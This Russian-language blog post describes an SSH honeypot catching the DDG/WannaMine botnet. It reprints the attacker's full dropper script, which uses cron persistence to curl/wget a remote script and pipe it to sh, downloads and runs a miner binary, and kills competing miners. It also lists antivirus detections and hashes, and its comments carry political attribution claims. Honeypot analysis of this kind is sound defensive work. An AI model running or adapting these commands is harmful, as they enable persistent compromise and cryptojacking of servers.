Наивные ХАКЕРЫ или Тролим БОТНЕТ WANNAMINE

ХАЦКЕРЫ
haker pidor
На накенец-то дошли руки до того чтобы посмотреть зачем хакерам доступ к терминалу SSH и Telnet.
Запускаем на серваке ФЭЙКОВЫЙ терминал cowrie, даём кулхакеру подобрать пароль напимер admin и пароль Qwerty!
Ржом!
Большинство уродБотНетов делают одно и тоже.
Входят,
62.93.166.91] login attempt [b'nproc'/b'nproc'] succeeded

Узнают тип процессора
62.93.166.91] executing command «b'cat /proc/cpuinfo | grep name | wc -l'»
62.93.166.91] Command found: cat /proc/cpuinfo

ну и уходят.

Но попался наконец-то кулхацкер… айпишник этого говноря 58.240.92.50! Ещё и китайский конечно же.

DDG 3014 Edition
United States
ВОт его код.


export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/15 * * * * (curl -fsSL http://104.248.181.42:8000/i.sh||wget -q -O- http://104.248.181.42:8000/i.sh) | sh" | crontab -

echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://104.248.181.42:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://104.248.181.42:8000/i.sh | sh" >> /var/spool/cron/root

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://104.248.181.42:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://104.248.181.42:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xakabcc || rm -rf xakabcc
if [ ! -f "xakabcc" ]; then
    wget -q http://104.248.181.42:8000/static/3020/ddgs.$(uname -m) -O xakabcc
    curl -fsSL http://104.248.181.42:8000/static/3020/ddgs.$(uname -m) -o xakabcc
fi
chmod +x xakabcc
$(pwd)/xakabcc || /usr/bin/xakabcc || /usr/libexec/xakabcc || /usr/local/bin/xakabcc || xakabcc || ./xakabcc || /tmp/xakabcc

ps auxf | grep -v grep | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "104.236.156.211" | awk '{print $2}' | xargs kill -9

if [ -e "/tmp/gates.lod" ]; then
    rm -rf $(readlink /proc/$(cat /tmp/gates.lod)/exe)
    kill -9 $(cat /tmp/gates.lod)
    rm -rf $(readlink /proc/$(cat /tmp/moni.lod)/exe)
    kill -9 $(cat /tmp/moni.lod)
    rm -rf /tmp/{gates,moni}.lod
fi

Ух обычный троян даунлоадер!

HEUR:Trojan-Downloader.Shell.Agent.c

ГОВНЯНЫЙ ХАЦКЕР! Но не на тех напал!
ВЫПОЛНЯЕМ ЧАСТЬ СКРИПТА И КАЧАЕМ ГОВНО ИЗ тырнета!

ЭТОЖЕ КОД DDG 3020


ddg 3010 3021 3030 3031 3040
DDG
— это ботнет, сфокусированный на управлении сканированием SSH, базах данных Redis и серверах баз данных OrientDB, а также вычислительной мощности сервера рисования (Monroe). Впервые мы увидели ботнет DDG 25 октября 2017 года, а затем выпустили отчеты и отчеты. Недавний доклад выпущен в 2018-08, был обновлен до версии DDG 3013.
Сейчас версия 3020
Долбаный БОТНЕТ!

КАЧАЕМ ФАЙЛЫ с 104.248.181.42:8000/static/3020/ddgs* именно линуксом с коммандной строки как в скрипте
Проверяем файл

Получаем результат

УРА ВИРУСНЯЯ WANNAMINE!
Результат проверки файл заражен Найденные угрозы HEUR:Trojan.Linux.Agent.fu Размер файла 3,57 МБ Тип файла EXE/ELF Дата проверки 2019 фев 19 18:25:48 Дата выпуска баз 2019 фев 19 14:47:40 UTC MD5 3ebe43220041fe7da8be63d7c758e1a8 SHA1 b016195f3f1b5470323053bb40378391f7869ff1 SHA256 484b97b1a68c28aee4906f3b12726a11357cb89d19fdb6a0f77819f0fe3438ea
оно же
Trojan.Linux.Agent.4!c
Other:Malware-gen [Trj]
Other:Malware-gen [Trj]
LINUX/Lady.kxkjx
Unix.Malware.Agent-6834479-0
[email protected]#2iuzlju9tg35f
Linux.Packed.288
Malware.LINUX/Lady.kxkjx
Linux/Lady.I!tr
Linux.Trojan.Agent.EG2WRV
Trojan.Linux.Lady
RiskTool.Linux.all
HEUR:Trojan.Linux.Agent.fu
Trojan:Win32/Casdet!rfn
Trojan.Elf32.Lady.fmmvre
Win32/Trojan.5be
static engine - malicious
Mal/Generic-S
Trojan.Gen.2
Coinminer.Linux.LADY.AA
Coinminer.Linux.LADY.AA
Trojan.Agent.Linux.1792
HEUR:Trojan.Linux.Agent.fu

Помогла эта статья? 
Отблагодарить можно  , ссылка)
https://money.yandex.ru/to/41001106083184

4 комментария

avatar
Понаблюдав пару дней за глупыми хацкерскими ботнетами сделал вывод — во всём виноваты американские хацкеры!
Вот Вам скриншоты самых атакующих стран
атаки американских хакеров, ботнет американцев, хацкеры
атаки американских хакеров, ботнет американцев, хацкеры
атаки американских хакеров, ботнет американцев, хацкеры
комментарий был удален
комментарий был удален
avatar
«США виновных всегда знают заранее. Их перечень включает всего четыре страны – Россию, Китай, Северную Корею и Иран. Видимо, из опасения разоблачения США отказываются от двусторонних экспертных консультаций с Россией, ведь они могут показать безосновательность их политических решений», — сказал он на брифинге в МИА «Россия сегодня».
По его словам, разведывательное сообщество США «даже при недостатке доказательств берет на себя смелость обвинить другую страну в компьютерной атаке».
«При этом делается оговорка: „Мы предполагаем“. В остальных случаях используются две формулировки „почти наверняка“ и „весьма вероятно“», — отметил Мурашов.
Только зарегистрированные и авторизованные пользователи могут оставлять комментарии.